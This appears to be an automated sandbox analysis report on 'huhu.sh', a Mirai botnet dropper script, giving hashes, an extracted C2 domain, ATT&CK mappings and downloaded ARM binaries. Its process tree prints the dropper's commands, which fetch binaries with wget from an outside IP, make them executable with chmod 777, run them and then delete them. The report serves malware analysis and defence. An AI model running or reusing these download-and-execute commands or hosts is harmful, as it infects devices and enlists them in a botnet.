mirai | 28dc0d138ce29791960807af2751f548f052071ea8bd97978844fd41bd6716fa

Analysis

max time kernel
149s
max time network
160s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
03-02-2025 20:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

huhu.sh
Size

612B
MD5

03e98be4a12a9568c29a2af67f0203e6
SHA1

4081ba65d287eb000bc8acf85450576502f320c0
SHA256

28dc0d138ce29791960807af2751f548f052071ea8bd97978844fd41bd6716fa
SHA512

c544a875edc33cd939ff88737d1a04a59181a0fd2febc6742b8e6412640e975c02e4430c5f88ed8217de48ef9187b3a68a7524be71b7191b8fc76c8c30764f6b

Score

10^/10

mirai botnet defense_evasion

Malware Config

Extracted

Family

mirai

gay.nguyenletriloc.pro

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
711	chmod
716	chmod
684	chmod
700	chmod

Deletes itself 3 IoCs

pid	Process
686	main_arm
701	main_arm5
717	main_arm7

Executes dropped EXE 4 IoCs

ioc	pid	Process
/main_arm	686	huhu.sh
/main_arm5	701	huhu.sh
/main_arm6	712	huhu.sh
/main_arm7	717	huhu.sh

Traces itself 6 IoCs

Traces itself to prevent debugging attempts

pid	Process
686	main_arm
688	main_arm
701	main_arm5
702	main_arm5
717	main_arm7
718	main_arm7

Changes its process name 3 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	httpd	686	main_arm
Changes the process name, possibly in an attempt to hide itself	httpd	701	main_arm5
Changes the process name, possibly in an attempt to hide itself	httpd	717	main_arm7

/tmp/huhu.sh
/tmp/huhu.sh
1⤵
- Executes dropped EXE
PID:664
- /bin/rm
  rm -rf main_arm
  2⤵
  PID:666
- /usr/bin/wget
  wget http://80.76.51.164/main_arm -O -
  2⤵
  PID:668
- /bin/chmod
  chmod 777 main_arm
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /main_arm
  ./main_arm pdvr
  2⤵
  - Deletes itself
  - Traces itself
  - Changes its process name
  PID:686
- /bin/rm
  rm -rf main_arm
  2⤵
  PID:689
- /bin/rm
  rm -rf main_arm5
  2⤵
  PID:692
- /usr/bin/wget
  wget http://80.76.51.164/main_arm5 -O -
  2⤵
  PID:693
- /bin/chmod
  chmod 777 main_arm5
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /main_arm5
  ./main_arm5 pdvr
  2⤵
  - Deletes itself
  - Traces itself
  - Changes its process name
  PID:701
- /bin/rm
  rm -rf main_arm5
  2⤵
  PID:703
- /bin/rm
  rm -rf main_arm6
  2⤵
  PID:705
- /usr/bin/wget
  wget http://80.76.51.164/main_arm6 -O -
  2⤵
  PID:707
- /bin/chmod
  chmod 777 main_arm6
  2⤵
  - File and Directory Permissions Modification
  PID:711
- /main_arm6
  ./main_arm6 pdvr
  2⤵
  PID:712
- /bin/rm
  rm -rf main_arm6
  2⤵
  PID:713
- /bin/rm
  rm -rf main_arm7
  2⤵
  PID:714
- /usr/bin/wget
  wget http://80.76.51.164/main_arm7 -O -
  2⤵
  PID:715
- /bin/chmod
  chmod 777 main_arm7
  2⤵
  - File and Directory Permissions Modification
  PID:716
- /main_arm7
  ./main_arm7 pdvr
  2⤵
  - Deletes itself
  - Traces itself
  - Changes its process name
  PID:717
- /bin/rm
  rm -rf main_arm7
  2⤵
  PID:719
- /bin/rm
  rm /tmp/huhu.sh
  2⤵
  PID:721

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/main_arm

Filesize
130KB

MD5
ea04094bf0f18047c4bfdb570b8bc339

SHA1
e968d1c312c0ae549b246572761227b62c438bc7

SHA256
b96ddaa05b3e4f2f827dc34f082b703c0ffba80f80ca4c8b502af3cf74f3f51d

SHA512
0f11722b737c98d8cec00d23f29d4f9589b0511ccbdc0d4e984fe154c8d14b39157540393ce0b0309f10672c2ab371e5313a8c91b102f526335b1286a4e57a1f

Download Submit
/main_arm5

Filesize
126KB

MD5
188b7e2886ceb67b5de635c72b4377cd

SHA1
5dde7e770dd94b7077794b30ee340f87630a8572

SHA256
3f74ae49e4101de58f98982358cafab767a1d90222c6ccba536e57c580b7b377

SHA512
bce91f75188c99ca7a71658b2815840c14949a15db9ac0d6a7cbe3c4aba6ffe92965049953dc7c3a17dbd31f2f69a79f24ac57e61d72f78aba1900781029987f

Download Submit
/main_arm6

Filesize
141KB

MD5
447f0e23f58bf497e2ae1c103dec482e

SHA1
edd209ceeafc7fe0987e4844fec9f170c02bdcb5

SHA256
71e5b3b550834ebf379c37f7f18a85825bf51a2bfb15ec01b41fd1f782b6a649

SHA512
ab451e7a3c9add9d6f6de31d592bbae9d2a3cb79ecf9e73815d5ddb45ae74113078934a7066cf5133078686935dc27cb80b5286e7fa74760143870fc4d3014d0

Download Submit
/main_arm7

Filesize
179KB

MD5
1c3bd0890fa6cbf314ec2cdc698fc1c8

SHA1
f165ecadfa8e07182029ab8cb8a6329b9574a795

SHA256
021af5763cd627a513838dcde0247979598f8f8efcf66ce4abf9a54fb5f64e4e

SHA512
aab772c56a231e14b0b0bf9fbc328b8d750ad0743db9426c8078420b01c85aeb2737d59d47e34ba3471869f65483591fe7b0de24720647db086c68e0001f335c

Download Submit